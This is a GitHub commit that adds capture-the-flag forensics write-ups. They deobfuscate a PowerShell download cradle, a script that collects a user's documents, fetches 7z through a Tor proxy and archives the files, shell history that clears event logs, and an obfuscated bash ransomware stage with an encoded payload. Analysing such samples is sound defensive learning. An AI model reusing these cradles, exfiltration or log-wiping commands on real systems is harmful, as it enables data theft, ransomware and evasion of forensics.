Skip to content

Commit 6fdf411

Browse files
sbencodingsbencoding
committed
docs: Add forensics writeups
1 parent a79c78f commit 6fdf411

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

45 files changed

+2299
-0
lines changed

forensics/alien_cradle.md

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
# Aliean cradle (very easy)
2+
We get a powershell script and we need to deobfuscate it.
3+
4+
```ps1
5+
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name -ne 'secret_HQ\Arth'){exit};$w = New-Object net.webclient;$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;$d = $w.DownloadString('http://windowsliveupdater.com/updates/33' + '96f3bf5a605cc4' + '1bd0d6e229148' + '2a5/2_34122.gzip.b64');$s = New-Object IO.MemoryStream(,[Convert]::FromBase64String($d));$f = 'H' + 'T' + 'B' + '{p0w3rs' + 'h3ll' + '_Cr4d' + 'l3s_c4n_g3t' + '_th' + '3_j0b_d' + '0n3}';IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
6+
```
7+
8+
It is plain to see the variable `$f` holds the flag in this case.
9+
10+
```ps1
11+
$f = 'H' + 'T' + 'B' + '{p0w3rs' + 'h3ll' + '_Cr4d' + 'l3s_c4n_g3t' + '_th' + '3_j0b_d' + '0n3}'
12+
```
13+
14+
Concatanating the strings gets us the flag.

forensics/artifacts_of_dangerous_sightings/README.md

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
# Artifacts of dangerous sightings (medium)
2+
For this challenge we get a `.vhdx` dump file and the first part of the challenge is opening this file.
3+
4+
Thankfully there's a [gist](https://gist.github.com/allenyllee/0a4c02952bf695470860b27369bbb60d) on how to do this.
5+
6+
Instead of following the mount command specified in the guide, allow me some hindsight and let's mount the container in a way that will be helpful later, I'll explain why.
7+
8+
```shell
9+
➜ HostEvidence_PANDORA sudo modprobe nbd max_part=16
10+
➜ HostEvidence_PANDORA sudo qemu-nbd -c /dev/nbd0 ./2023-03-09T132449_PANDORA.vhdx
11+
➜ HostEvidence_PANDORA sudo partprobe /dev/nbd0
12+
➜ HostEvidence_PANDORA sudo mount -t ntfs -o ro,streams_interface=windows /dev/nbd0p1 ./mnt
13+
```
14+
15+
Now the disk dump file is mounted under the local `mnt` folder, let's explore inside.
16+
For forensics challenges a common file I check if possible is the console history, to see if I can extract any useful information.
17+
We are in luck, it seems that this file exists in this dump.
18+
19+
```
20+
type finpayload > C:\Windows\Tasks\ActiveSyncProvider.dll:hidden.ps1
21+
exit
22+
Get-WinEvent
23+
Get-EventLog -List
24+
wevtutil.exe cl "Windows PowerShell"
25+
wevtutil.exe cl Microsoft-Windows-PowerShell/Operational
26+
Remove-EventLog -LogName "Windows PowerShell"
27+
Remove-EventLog -LogName Microsoft-Windows-PowerShell/Operational
28+
Remove-EventLog
29+
```
30+
31+
Okay so first an **alternate data stream** is created in the `ActiveSyncProvider.dll` file and then a bunch of event logs are cleaned out.
32+
Now this is where it makes sense that I replaced the mount command, to use `ntfs-3g` and to provide the `streams_interface=windows` option.
33+
This will allow us to access the alternate data stream.
34+
35+
```shell
36+
➜ HostEvidence_PANDORA cat mnt/C/Windows/Tasks/ActiveSyncProvider.dll:hidden.ps1
37+
```
38+
39+
This command will give use a large powershell command, which I have included in the `hidden.ps1` file.
40+
41+
After decoding the base64 string and removing null bytes, we get the result I have placed in `stage2.ps1`. It looks heavily obfuscated, however at the end we see that a string is passed into execution with `|& ${=@!~!}`
42+
43+
So let's execute the script without the execution part in an online interpreter and see what we can get, the result is placed in `stage3.ps1`.
44+
45+
These are just a bunch of ascii characters concatanated, so I wrote the `stage3.py` script to decode it.
46+
The decoded result is placed in `final.ps1`
47+
48+
And the source code contains the flag
49+
```ps1
50+
$TopSecretCodeToDisableScript = "HTB{Y0U_C4nt_St0p_Th3_Alli4nc3}"
51+
```

forensics/artifacts_of_dangerous_sightings/final.ps1

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
### . . . . . . . . . + .
2+
### . . : . .. :. .___---------___.
3+
### . . . . :.:. _".^ .^ ^. '.. :"-_. .
4+
### . : . . .:../: . .^ :.:\.
5+
### . . :: +. :.:/: . . . . . .:\
6+
### . : . . _ :::/: .:\
7+
### .. . . . - : :.:./. .:\
8+
### . . : . : .:.|. ###### #######::|
9+
### :.. . :- : .: ::|.####### ########:|
10+
### . . . .. . .. :\ ######## ######## :/
11+
### . .+ :: : -.:\ ######## ########.:/
12+
### . .+ . . . . :.:\. ####### #######..:/
13+
### :: . . . . ::.:..:.\ ..:/
14+
### . . . .. : -::::.\. | | .:/
15+
### . : . . .-:.":.::.\ .:/
16+
### . -. . . . .: .:::.:.\ .:/
17+
### . . . : : ....::_:..:\ ___ :/
18+
### . . . .:. .. . .: :.:.:\ :/
19+
### + . . : . ::. :.:. .:.|\ .:/|
20+
### SCRIPT TO DELAY HUMAN RESEARCH ON RELIC RECLAMATION
21+
### STAY QUIET - HACK THE HUMANS - STEAL THEIR SECRETS - FIND THE RELIC
22+
### GO ALLIENS ALLIANCE !!!
23+
function makePass
24+
{
25+
$alph=@();
26+
65..90|foreach-object{$alph+=[char]$_};
27+
$num=@();
28+
48..57|foreach-object{$num+=[char]$_};
29+
30+
$res = $num + $alph | Sort-Object {Get-Random};
31+
$res = $res -join '';
32+
return $res;
33+
}
34+
35+
function makeFileList
36+
{
37+
$files = cmd /c where /r $env:USERPROFILE *.pdf *.doc *.docx *.xls *.xlsx *.pptx *.ppt *.txt *.csv *.htm *.html *.php;
38+
$List = $files -split '\r';
39+
return $List;
40+
}
41+
42+
function compress($Pass)
43+
{
44+
$tmp = $env:TEMP;
45+
$s = 'https://relic-reclamation-anonymous.alien:1337/prog/';
46+
$link_7zdll = $s + '7z.dll';
47+
$link_7zexe = $s + '7z.exe';
48+
49+
$7zdll = '"'+$tmp+'\7z.dll"';
50+
$7zexe = '"'+$tmp+'\7z.exe"';
51+
cmd /c curl -s -x socks5h://localhost:9050 $link_7zdll -o $7zdll;
52+
cmd /c curl -s -x socks5h://localhost:9050 $link_7zexe -o $7zexe;
53+
54+
$argExtensions = '*.pdf *.doc *.docx *.xls *.xlsx *.pptx *.ppt *.txt *.csv *.htm *.html *.php';
55+
56+
$argOut = 'Desktop\AllYourRelikResearchHahaha_{0}.zip' -f (Get-Random -Minimum 100000 -Maximum 200000).ToString();
57+
$argPass = '-p' + $Pass;
58+
59+
Start-Process -WindowStyle Hidden -Wait -FilePath $tmp'\7z.exe' -ArgumentList 'a', $argOut, '-r', $argExtensions, $argPass -ErrorAction Stop;
60+
}
61+
62+
$Pass = makePass;
63+
$fileList = @(makeFileList);
64+
$fileResult = makeFileListTable $fileList;
65+
compress $Pass;
66+
$TopSecretCodeToDisableScript = "HTB{Y0U_C4nt_St0p_Th3_Alli4nc3}"
67+

forensics/artifacts_of_dangerous_sightings/hidden.ps1

Lines changed: 1 addition & 0 deletions
Large diffs are not rendered by default.

forensics/artifacts_of_dangerous_sightings/stage2.ps1

Lines changed: 2 additions & 0 deletions
Large diffs are not rendered by default.

forensics/artifacts_of_dangerous_sightings/stage3.ps1

Lines changed: 1 addition & 0 deletions
Large diffs are not rendered by default.

forensics/artifacts_of_dangerous_sightings/stage3.py

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
cont = open('./stage3.ps1', 'r').read().split(' + ')
2+
3+
buf = []
4+
for tok in cont:
5+
ccode = int(tok[6:])
6+
buf.append(chr(ccode))
7+
8+
print(''.join(buf))

forensics/bashic_ransomware/README.md

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
# Bashic ransomware (hard)
2+
As part of the challenge we get
3+
* Memory dump of the target
4+
* symbols for the target (useful for analyzing memory dump with volatility)
5+
* Encrypted flag file
6+
* traffic capture
7+
8+
First I have looked at the traffic capture file and it was pretty short.
9+
Just one HTTP request/response.
10+
I have extracted the response and placed it in the `stage1.sh` file
11+
12+
Since this is just a bash script we can replace all the `eval` calls with the `echo` command and see what the decoded script looks like.
13+
I have modified `stage1.sh` to print what it would do instead of actually executing it to get the next stage.
14+
15+
It seems that the output is a command which reverses a string and then base64 decodes it. Then the result of this is stored in `$x` and evaluated directly
16+
17+
The next stage I saved in `stage2.sh`
18+
19+
We see that this file imports a gpg key and the encrypts all files with certain extensions.
20+
The encryption works as follows:
21+
* Import hard coded GPG key
22+
* Generate a random key with `/dev/urandom`
23+
* Encrypt this random key using the GPG key from step 1
24+
* Send the encrypted key to the remote
25+
* Use the random key as a key for symmetric AES256 encryption on the specified files
26+
* Remove plaintext files
27+
28+
At this point it must be that the key is somewhere in the memory dump.
29+
Sicne the new files have the `.a59ap` extension, and the random key is used in the same command where the new file is generated I thought it would be a good idea to look for this extension in the memory dump and see if a string matching the key could be around.
30+
31+
And sure enough after doing a simple search for the extension I find it at offset `0x21FFB30` and at offset `0x21FFB71` there is a string which is likely the flag:
32+
* It is 16 characters long
33+
* It contains only alphanumeric characters
34+
* `wJ5kENwyu8amx2RM`
35+
36+
Using the following command I have managed to recover the flag:
37+
```bash
38+
echo "wJ5kENwyu8amx2RM" | gpg --batch -o plain.txt --passphrase-fd 0 --decrypt --cipher-algo AES256 flag.txt.a59ap
39+
```

forensics/bashic_ransomware/stage1.sh

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" '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rFWesZlWLh3aNZUOH1ERS52QJhWVahlUWlVMadUZ0RWRX9kUwU1V1U1TXpVRhtEcupFdCFjUVVzVTtkRUVWekZUZDRWMZBHZxQFUCNTUGpkRiJHZFFGM0NVZtplRkNVODdlbWdVUVB3dTFzdHJWWsdVT0oURiNlVGZlNatGVrpUVUBzYsFmMjhkTTxGMhZjQE1UY0dlYzh3RhRTWUZlM4V0UYVzaZVFcrlFWkpnUIhnMiJHbtlVNjZUZoZUbUt0aGJ1MOhkV5dWMSBnRUdlcVh0VZlzUkNHctRWN4IDVvp0VTllWupVNnpHTXJlbTlkTrVFbGJjYZp0aURTTsNFN0JzSOxmRNlXVsJGeOZlUyUkbjBDasNUMsdkWyFkaTdnVtp1dB5WTYp1RahnUtlFbOVkU1xWbTdVOVZlSORlYrJVRlpkU65EWOhlTzIEWaZXMHJmcnd0TCh2aWpXQuFVVxs2YRZVRNRkVVJlRwdGVwQmRUVnWEFGeVRlWrZEVlhmVyklRkNDZ1kkbTNjVyoldoREZRxGMhRTVwolSopXU2hGWidlRzEWMOVkV0okMhplWVVlRk5WWoZEMWlkUysESstWYLNGRlVEasRmWCNDZhRmaOFTS6pld0IzY2YlRlhXU6xERCpWWxolVhNlQzEWaCpHZTlzQSNlTwMlQGBjWZxWVVJkVXNlUGVkUKRWbSZEbwQGRsBTYu50aDdFbxolQoBjWS5URUZFZYFVasBDZydGbjVzaxElVk1mVwpkRjJnSH10MKFDTxZVVRpEbrpVcGxGV0Jkek5kWqd1VGZVVKRWMaVkRwMlRkhlUGJleZJEcnNlMRtWWvVzaNlmTY5UNG1WYHRWVZJkRq1UawhlTYxmVlRjUVNVMZxWTUJFWPlXTXR2RxclVrZEbZJkRVJlUWVVU0AzVOFHZU5ESOdlYzU1aZJFbYV1SzVUTYlzahdnSVNmasxWV2RXbRhHOTNmQ1cVW6t2MMVlV6tUYkh0Vrp1VXFFdHRmevZVV4N3VNJTWHVmR5U1YyRmaUJEZERFeNFDVDpkaWBDaqN2Qat2Q4tmVkZXNrFlRoNDVMpkMUtmTuNlQKVVT0MmeTtmRsJlWS1mYNpEWXhXRsFmVxU1VaxWVT5WOD5ESCpnYGpVVSBVNF5ETsV0TUJFVTRzZE9ENVd0Tx82dNBzYU5kcJ5GZ5d3VihXVz0EdCRFZvJFSjZEaXRGcahkV2gmRi1mRwE2dZ1WUwJEWOpmSrNmM4UkT2p1VZ9EZIdVWONDZzIEWS9mRWNGMnRlVth3aNt0bI1EW0l3UrhWRkZXSuRWU41mVHljMMhmWGR1b01WU6h2ROVFZHNVbwJTVL5UbOZVODNmeWVUVHpFWZVjTVFlUsNjWPxGVjBDazYVMNVVZUx2MVlGbsNEeS1WVWhHMWlFeVJmQOhVYtx2VNdXUwQmd0ADTTZ0MjNHZV1EaGJjWzYFRONTT6RmWSh1VUZURa9kSqVlcFhVUpJEWaREbIVmesBTTuZkeZdFbFJGawFlTJh3aXVDbXNlVOxGVwUVVjpXSW10cONDZSx2aUVkT6ZldBRUYyg2VTJTREJFNvZ0YHZlVPtGdH1Uc1IDTVp1aSRDbYdVY0tmWZRGWZVkRw4EMjR1YLl1MOllTFNWNwdkWNlTeNlnTU50VwVUT0kjMLhkTWd1MnpWT6RWMWBlWrZVMFNTU2lEbiJDdH9Uc0lWYEhWRhRTRG5EdGVkTuxmVlBDa6tkMOR1UpZ1aDNDcyE1RkBjY5NHMN1EetJVWaBTVsZURPdXV6p1MsNjUIZEbR5kWwMWRshVY1JkbW5kRuFWYOpmV2YVVSpEbEJFWSVVUFpEMjZXRUlVUktWUPRWVVRHcnNEdwMFT0BTeTRUOFR1QCN1VGRXRJREbFR1QWZUVnFUMSFlQpRlSkVlUDFzUMRHMTxkI9oGZPl3MLdzb0UmV5pGb0lgC7BSKo0UW6RnYzR1Q2YkTYF0M3gHSNZUdKg2chJ2LulmYvEyI
2+
' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp=""
3+
#x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp")
4+
echo "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp"
5+
#eval "$N0q$x$Hc2$rQW"
6+
echo "$N0q<decoded>$Hc2$rQW"

0 commit comments

Comments
 (0)
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy